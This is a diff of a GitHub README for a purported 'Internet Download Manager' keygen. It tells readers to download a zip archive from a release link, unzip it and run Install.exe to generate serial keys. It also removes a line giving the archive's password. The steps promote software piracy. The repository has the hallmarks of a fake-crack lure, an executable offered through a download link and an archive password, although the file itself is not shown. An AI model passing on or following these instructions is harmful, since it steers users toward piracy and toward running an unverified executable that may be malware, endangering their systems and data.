Gurleen-kansray/Internet-Download-Manager-Latest-Keygen/README.md

 - .NET Framework (for Windows users)

 ## Installation
-### Archive Password: g1tsofts25
-1. Download the archive from [here]( https://github.com/golovkolomka/Internet-Download-Manager-Latest-Keygen/releases/download/v1.9/idm-keygen.zip )
+1. Download the archive from [here](https://github.com/golovkolomka/Internet-Download-Manager-Latest-Keygen/releases/download/v1.9/idm-keygen.zip)

 2. Unzip to any folder

-3. Run Project.exe
+3. Run Install.exe

 4. Click the "Generate" button to generate a new serial key.